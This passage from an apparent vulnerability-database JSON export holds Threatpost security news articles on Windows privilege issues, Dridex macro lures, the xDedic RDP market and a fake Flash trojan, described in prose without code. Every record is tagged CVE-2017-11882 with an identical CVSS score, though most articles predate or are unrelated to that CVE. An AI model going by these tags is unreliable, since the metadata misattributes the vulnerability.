that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. 
When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:\\Users\\username\\AppData\\Local\\Temp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp` (where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. 
Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. 
I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. 
\n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "description": "Not long ago, criminals pushing the Dridex banking Trojan were using [Microsoft Excel documents spiked with a malicious macro](<http://threatpost.com/dridex-banking-trojan-spreading-via-office-macros/110255>) as a phishing lure to entice victims to load the malware onto their machines.\n\nEven though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure.\n\nResearchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users\u2019 trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines.\n\nThe XML files are passed off as \u201cremittance advice,\u201d or payment notifications, with the hopes that some users will believe it\u2019s an innocent text file and execute the malicious code.\n\n\u201cXML files are the old binary format for Office docs and once you double click them to open, the file associated with 
Microsoft Word and opens,\u201d said Karl Sigler, Trustwave threat intelligence manager. The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to be viewed properly or to ensure proper security. \u201cWhich is the exact opposite of what this does,\u201d Sigler said. \u201cIt doesn\u2019t seem to be all that sophisticated. They\u2019re either trying to capitalize on a user\u2019s trust in XML files, or the fact that a user may not be that familiar with what that extension is.\u201d\n\nIf the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visit an online banking site and then injects code onto the bank site in order to capture the user\u2019s credentials for their online account.\n\nSigler said this is the first time they\u2019ve spotted XML docs used as a lure. As for macros, they\u2019ve been disabled by default since Office 2007 was released.\n\n\u201cSometimes in large organizations, local administrators have the ability to enable macros,\u201d Sigler said. \u201cSome organizations use them quite a bit, but it\u2019s not common. Most people leave the default settings. It\u2019s hard to say why these guys moved to XML. It could be that they\u2019re looking for a new attack vector and they weren\u2019t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they\u2019re looking for a way to better their success rate.\u201d\n\nDridex is a descendant of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. 
It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.\n", "cvss3": {}, "published": "2015-03-06T13:38:40", "type": "threatpost", "title": "Dridex Banking Trojan Spreading Via Macros in XML Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-10T11:23:01", "id": "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "href": "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:07", "description": "The IDG News Service is reporting that Microsoft\u2019s latest round of security patches appears to be causing some PCs to seize up and display a black screen, rendering the computer useless. The problem affects Microsoft products including Windows 7, Vista and XP operating systems.\n\nFrom the article:\n\nMicrosoft apparently made changes to the Access Control List (ACL), a list of permissions for a logged-on user. The ACL interacts with registry keys, creating visible desktop features such as a sidebar.\n\nHowever, the latest patches appear to make some changes to those registry keys. 
The effect is that some installed applications aren\u2019t aware of the changes and don\u2019t run properly, causing a black screen.\n\n[Read the full story](<http://www.computerworld.com/s/article/9141568/Latest_Microsoft_patches_cause_black_screen_of_death?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-11-30T15:38:43", "type": "threatpost", "title": "Latest MS Patches Causing Black Screen of Death", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:03:25", "id": "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "href": "https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/73168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later, admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson.\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. 
Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update failed to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>)_ reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). 
Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post_ article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services, leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after the fact. This is a point of leverage the government can use. 
We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:48", "description": "TENERIFE, Spain \u2013 Network defenders who rely solely on lists of assets to protect are running a fool\u2019s errand.\n\nInstead, it\u2019s crucial to think in graphs to not only visualize threats, but also to understand network edges, and dependencies between assets and accounts in order to be able to capture attacker activities and render them useless.\n\nJohn Lambert, general manager of Microsoft\u2019s Threat Intelligence Center, said in today\u2019s keynote address at the Kaspersky Lab Security Analyst Summit that while successful defenders may understand the basic security principles of confidentiality, integrity and availability, they\u2019re interpreting each point on the triad in radically new ways.\n\n\u201cThey\u2019re discarding stuff that doesn\u2019t work,\u201d Lambert said. \u201cAnd stuff they don\u2019t have, they\u2019re inventing it.\u201d\n\nLambert recalled a time not so long ago when defenders were too protective of their intelligence. It was crucial to understand the assets in their environments, develop incident response plans, and view penetration test results as a report card on their internal security\u2014an output. 
Intelligence was rarely shared; for example, analysts weren\u2019t sent to security conferences for fear of \u201cblabbing\u201d threat indicators that might give away a competitive advantage.\n\nModern defenders cannot afford to think that way, Lambert said. One graph he demonstrated showed dependencies between network edges, accounts and permissions that spread across the screen like bacteria in a petri dish.\n\n\u201cModern defenders, they have a graph of things to protect,\u201d Lambert said. \u201cThey think about adversaries and their next move. They find trusted peers in the community, and understand the importance of learning from others and their practices. Pen-tests are diagnostics to successful defenders, not a report card. Pen-tests are input, with a goal of increasing attacker requirements.\u201d\n\nLambert shared examples of changes Microsoft has made to core security and detection processes that have eventually made their way into patches and updates that have eliminated scores of zero-days.\n\n\u201cWe are in a world where modern defenders are sharing about adversaries across geographies, industries and even within lines of competition,\u201d Lambert said. \u201cThreats are a common thing we all face. There\u2019s no magical information-sharing thing. It\u2019s a trust-based thing. You have to get to know people, you\u2019re not trading with a vendor, you\u2019re sharing with a person. It\u2019s not a transactional relationship. 
You want to give them indicators because you want them to find more out there and it will help you down the line.\u201d\n\nThe goal should be not only to get attackers off your network and imprison hacker activity, but also to raise the cost of exploit development for attackers.\n\n\u201cYou want to force adversaries to go back to development,\u201d Lambert said, adding that cooperation, even among professional competitors, leads to important research being published, which could awaken others to lend a fresh set of eyes to the problem.\n\n\u201cThe goal should be to remove all of us from a world of information siloes and not sharing, to a world where hacker activity is imprisoned and all their opsec mistakes are trapped and can\u2019t be used anymore,\u201d Lambert said. \u201cKnowledge of intrusion sets grows and grows. This just serves to improve adversary coverage and helps everyone.\u201d\n", "cvss3": {}, "published": "2016-02-08T08:05:53", "type": "threatpost", "title": "Modern Defenders Share, Visualize and Succeed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-02-17T16:28:47", "id": "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "href": "https://threatpost.com/modern-defenders-share-visualize-and-succeed/116181/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:58", "description": "LAS VEGAS \u2014 It wasn\u2019t long ago that ROP, or return-oriented programming, was a hacker\u2019s best friend when it came to bypassing mitigations against memory-based attacks such as DEP and ASLR.\n\nROP, however, is so 2005. In the last couple of years, researchers and attackers have figured out how to bypass popular tools such as Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET), without the need for ROP. 
Exploit kits, for example, have integrated attacks that have moved up the exploitation stack closer to memory and before code is written to disk. All the while, defenders still focus on post-exploitation techniques (i.e., ROP) that are obsolete today.\n\nThis week at Black Hat USA 2016 in Las Vegas, researchers at Endgame are expected to introduce new defensive techniques that could level the playing field. Their approach is called Hardware Assisted Control Flow Integrity (HA-CFI), which leverages features in the micro-architecture of Intel processors, such as the performance monitoring unit (PMU), for security.\n\n\u201cDuring the last two years, academics have been using it for security purposes,\u201d said Cody Pierce, Endgame director of vulnerability research. \u201cWe\u2019re continuing the idea of using hardware features to implement a security check. That\u2019s where CFI comes in and monitors the PMU to get real-time views into protected processes.\u201d\n\nWhere tools such as EMET catch attacks in the post-exploitation stage of an attack, HA-CFI operates in the exploitation stage before bypasses happen.\n\n\u201cIt\u2019s generic in the fact it has no knowledge of exploit techniques, and doesn\u2019t know about ROP; the system is autonomous,\u201d Pierce said. \u201cWhat it\u2019s looking for is an abnormal change in execution. Usually this is the absolute first step of exploits. They will redirect execution from normal- to attacker-controlled execution. That\u2019s a very specific thing that we\u2019re hoping to pick up on.\n\n\u201cAn analogy to malware would be that you would want to pick up detection of malware before it\u2019s written to disk,\u201d Pierce said. 
\u201cYou don\u2019t want to wait until it runs and sets up persistence and backdoors.\u201d\n\nMicrosoft implemented [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) starting with Visual Studio 2015 and it runs only on x86 and x64 releases on Windows 8.1 and Windows 10. CFG restricts where applications can execute code from, Microsoft said, cutting into the effectiveness of code execution attacks and buffer overflow exploits. Pierce said CFG has its limitations, specifically that it can run only on the latest compilers and OSes, requiring organizations to recompile in order to run it. HA-CFI would operate at runtime, and its biggest limitation, Pierce said, is a performance overhead that could be 3x higher than Microsoft\u2019s, requiring organizations to consider that tradeoff when protecting commonly exploited apps such as browsers, Office and Flash.\n\nAs for ROP being on life support, a number of prominent researchers have been developing new approaches to mitigation bypasses that are putting those attacks out to pasture. [Yang Yu](<https://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328/>), a two-time [Microsoft bounty winner](<https://threatpost.com/patched-badtunnel-windows-bug-has-extensive-impact/118697/>), really got the ball rolling with a 2014 Black Hat talk called [Write Once, Pwn Anywhere](<https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf>) where he was able to change a value in memory that allowed his attack to bypass native restrictions and execute commands sans ROP. 
The Hacking Team dump of last summer also showed that other professionals had [moved beyond ROP](<https://threatpost.com/curious-tale-of-a-microsoft-silverlight-zero-day/115873/>) with a slate of attacks that [bypass EMET](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) and other mitigations.\n\n\u201cFrom an exploit writer\u2019s perspective, you don\u2019t want to have to do more work than necessary, and we\u2019ve learned ROP is a little unnecessary,\u201d Pierce said, adding that some of these techniques that have become public in the last 12-18 months have made it easier to develop more powerful exploits.\n\n\u201cWith ROP, usually some work has to be done to get all versions of apps you want to exploit,\u201d Pierce said. \u201cThese advanced approaches eliminate that need.\u201d\n", "cvss3": {}, "published": "2016-08-01T13:00:22", "type": "threatpost", "title": "HA-CFI Technique Checks Mitigation Bypasses Earlier", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-07-29T19:00:17", "id": "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "href": "https://threatpost.com/new-technique-checks-mitigation-bypasses-earlier/119568/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:00", "description": "One by one, tech companies have [been tossing aside the SHA-1 cryptographic algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) like the unreliable collision-prone mess that it is.\n\nMicrosoft was among the first to steer its customers away from SHA-1 and established an internal edict that its developers would no longer use it for code-signing or its certificates after January 2016.\n\nYesterday among the flurry of its [Patch Tuesday security bulletins](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>), Microsoft took 
another important step when it issued a pair of security advisories, one notifying users that it had made the [SHA-2 algorithm available for Windows 7 and Windows Server 2008 R2](<https://technet.microsoft.com/en-us/library/security/2949927>). The other was an update for Microsoft EAP implementations that [enables the use of Transport Layer Security (TLS) 1.1 or 1.2](<https://technet.microsoft.com/en-us/library/security/2977292>).\n\nSHA-1 collisions have been theoretically possible for years; collisions occur when an attacker is able to generate a certificate with the same signature as the original cert. Though mathematically possible, a collision attack, even against a weakened SHA-1, would take significant hardware resources in order to execute.\n\nThat gap, however, is narrowing. In 2012, Bruce Schneier published research in which he concluded that [collisions would be within reach of most hackers by 2018](<http://threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Citing calculations done by Jesse Walker based on the cost of commodity microprocessors and evidence that Moore\u2019s law will extend another decade, server-cycle costs would be around $173,000 on Amazon, well within reach of a funded attacker such as an organized crime group or nation state.\n\nThe use of fraudulent certificates would allow an advanced attacker such as a nation state to pose as Microsoft, Google or any site of their choosing, putting web traffic and personal communication at risk. Google, and most recently Mozilla, have announced their road maps for SHA-1 deprecation. Beginning with an upcoming Chrome release in November, [Google\u2019s browser will no longer trust websites whose certificate chains trust SHA-1](<http://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>). 
Mozilla, meanwhile, asked Certificate Authorities and websites to [upgrade to cryptographically stronger versions of the algorithm](<http://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>) and said it would no longer trust SHA-1 certs after Jan. 1, 2017.\n\nMicrosoft\u2019s decision to make SHA-2 available for Windows 7 means that it joins Windows 8, 8.1 and Windows Server 2012, 2012 R2 and Windows RT and RT 8.1, as Windows versions that already support SHA-2. Windows 8 and higher support it by default and do not require an update, Microsoft said, adding that the update is not available for Windows Server 2003, Windows Vista, or Windows Server 2008.\n\nMicrosoft\u2019s decision to enable TLS for EAP implementations continues its push to encrypt its web-based services. In July, Microsoft announced that its webmail service [Outlook.com supports TLS encryption](<http://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>) inbound and outbound, in addition to Perfect Forward Secrecy. OneDrive cloud storage also enabled Perfect Forward Secrecy in July, Microsoft said. PFS randomizes private encryption keys, meaning that if a key is someday compromised, it cannot be used to decrypt old messages.\n\nEAP, or Extensible Authentication Protocol, is the authentication framework used in Windows client and server rollouts. Windows 7, Windows Server 2008 R2, Windows 8, Windows 8.1, Windows Server 2012, and Windows RT are enabled through the update to support TLS via a simple registry modification, Microsoft said. A hacker who is able to exploit an older version of TLS could carry out a man-in-the-middle attack, hijack traffic and steal information in plaintext from sessions thought to be encrypted.\n\n_This article was updated Oct. 
16 clarifying that SHA-2 is available only for Windows 7 and up, and earlier supported versions of Windows will not support SHA-2._\n", "cvss3": {}, "published": "2014-10-15T11:40:36", "type": "threatpost", "title": "Microsoft Extends SHA-2, TLS Support for Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-10-21T15:09:13", "id": "THREATPOST:AE4AEC18802953FE366542717C056064", "href": "https://threatpost.com/microsoft-extends-sha-2-tls-support-for-windows/108855/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:47", "description": "Nearly two-thirds of servers and PCs peddled on the xDedic underground marketplace belong to schools and universities, and most are based in the United States.\n\nIn a [recent analysis of xDedic](<https://www.flashpoint-intel.com/blog/cybercrime/xdedic-rdp-targets/>), Flashpoint found that besides the education sector, PC and servers tied to healthcare and legal firms make up the bulk of the available vulnerable systems.\n\nXDedic is the largest of many platforms cybercriminals use to buy access to compromised servers and PCs that use Microsoft\u2019s Remote Desktop Protocol (RDP). Using brute-force password attacks, the xDedic gang has grown the number of servers and PCs available for access to 85,000, up 10 percent from a year ago, according to Flashpoint.\n\nCriminals charge $50 to access the marketplace via Tor. Once in, criminals can browse thousands of compromised servers and PCs that can be accessed via a remote desktop session. 
Typically, access to a PC or server can range from $7 to $15, according to Flashpoint.\n\nOnce a hacker accesses a remote system they can steal data, move laterally within a corporate network or install malware.\n\n\u201cXDedic is the most prolific of these cybercriminal gangs. They have their own proprietary tools and techniques and have been prospering over the past year,\u201d said Vitali Kremez, senior intelligence analyst at Flashpoint.\n\nIn its research, Flashpoint said the United States, Germany, and Ukraine appear to be the most frequently targeted countries. The most exploited sectors are education, followed by healthcare, legal, aviation, and government. Least vulnerable to these types of attacks are the financial and telecom sectors.\n\n\u201cSchools appear to be the hardest hit because they have the least mature security departments and just can\u2019t effectively mitigate against these types of attacks,\u201d Kremez said. \u201cSchools also sometimes have large banks of RDP systems for students to access and play with.\u201d\n\nWhen it comes to being targeted by these types of attacks, Kremez said, the leading factors are a lack of computer hygiene, the number of external RDP servers available and systems that have notoriously bad passwords.\n\nOver the past year, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) has had its ups and downs. XDedic\u2019s original domain (xdedic[.]biz) disappeared shortly after [a Kaspersky Lab report](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/22070309/xDedic_marketplace_ENG.pdf>) (PDF) published in June described how xDedic provided a platform for the sale of compromised RDP servers. 
A month later in July, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) resurfaced, this time on a Tor domain, where it remains today.\n\n\u201cMicrosoft Windows is the most popular of the platforms targeted by these types of attacks,\u201d Kremez said. \u201cSimply put, Windows is the most prolific system out there. When a criminal is looking to find the biggest easiest target with the highest probability of a successful infiltration, Windows is it,\u201d he said.\n\nAs for Microsoft, Kremez said, it is constantly updating its RDP software to thwart bad guys. \u201cThe weakest link isn\u2019t software. It\u2019s the human factor and a failure to secure servers and client PCs to begin with. Oftentimes people misconfigure their RDP server or give them passwords that are just not adequate.\u201d\n", "cvss3": {}, "published": "2017-04-25T13:45:07", "type": "threatpost", "title": "xDedic Market Spilling Over With School Servers, PCs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-03-22T11:03:12", "id": "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "href": "https://threatpost.com/xdedic-market-spilling-over-with-school-servers-pcs/125202/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). 
The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yandex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said that by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home page will be changed.\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains for the new start pages, as well as the domains hosting the malicious Flash update, were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. 
Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:59", "description": "Microsoft plans to ship 10 security bulletins next Tuesday (June 9, 2009) with fixes for a wide range of code execution vulnerabilities affecting Windows, Microsoft Office and Internet Explorer.\n\nSix of the ten bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. See the [advance notice advisory](<http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx>) [microsoft.com]. 
